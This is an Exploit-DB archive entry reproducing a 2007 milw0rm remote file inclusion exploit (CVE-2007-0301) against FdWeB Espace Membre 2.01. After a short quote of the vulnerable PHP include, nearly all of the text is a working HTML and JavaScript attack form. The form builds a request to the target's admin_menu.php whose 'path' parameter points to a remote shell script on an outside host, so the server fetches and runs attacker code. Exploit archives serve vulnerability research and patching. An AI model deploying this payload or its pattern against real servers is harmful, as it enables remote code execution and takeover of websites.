FdWeB Espace Membre <= 2.01 path Remote File Include Exploit

2007-01-13T00:00:00
ID EDB-ID:3123
Type exploitdb
Reporter ajann
Modified 2007-01-13T00:00:00

Description

FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit. CVE-2007-0301. Webapps exploit for php platform

                                        
                                            &lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1254"&gt;
&lt;title&gt;FdWeB Espace Membre &lt;= 2.01(path) Remote File Include Vulnerability&lt;/title&gt;

&lt;script language="JavaScript"&gt;
 
//'===============================================================================================
//'[Script Name: FdWeB Espace Membre &lt;= 2.01(path) Remote File Include Vulnerability
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[$$         : Free
//'[Using : Write Target after Submit Click
//'===============================================================================================

//'[[ERROR]]]------------------------------------------------------
//'....
//'..
//'&lt;?
//'	$nom = "menu_admin.gif";
//'	$include_haut = $path."include/table_text_gh.php"; 
//'	$include_bas = $path."include/table_text_gb.php"; 
//'	include($include_haut);
//'?&gt;
//'....
//'..
//'[[ERROR]]]---------------------------------------------------------

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path="/_admin/"
   var adres="admin_menu.php?" //File name
   var acik ="path=" // Line 5
   var shell="http://kro.275mb.com/57.txt?" // Shell Script
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready Target : )
  rfi.submit(); // Form Submit
   }
&lt;/script&gt;

&lt;/head&gt;

&lt;body bgcolor="#000000"&gt;
&lt;center&gt;

&lt;p&gt;&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;FdWeB Espace Membre &lt;= 2.01(path) Remote File Include Vulnerability&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;
&lt;form method="post" target="getting" name="rfi" onSubmit="command();"&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FF0000"&gt;Target:&lt;/font&gt;&lt;font face="Arial" size="1" color="#808080"&gt;[http://[target]/[scriptpath]&lt;/font&gt;&lt;font color="#00FF00" size="2" face="Arial"&gt;
  &lt;/font&gt;&lt;font color="#FF0000" size="2"&gt;&nbsp;&lt;/font&gt;&lt;/b&gt;
  &lt;input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Gonder" name="B1"&gt;&lt;input type="reset" value="Sifirla" name="B2"&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;p&gt;&lt;br&gt;
&lt;iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"&gt;&lt;/iframe&gt;
&lt;/p&gt;

&lt;b&gt;&lt;font face="Verdana" size="2" color="#008000"&gt;ajann&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/center&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2007-01-13]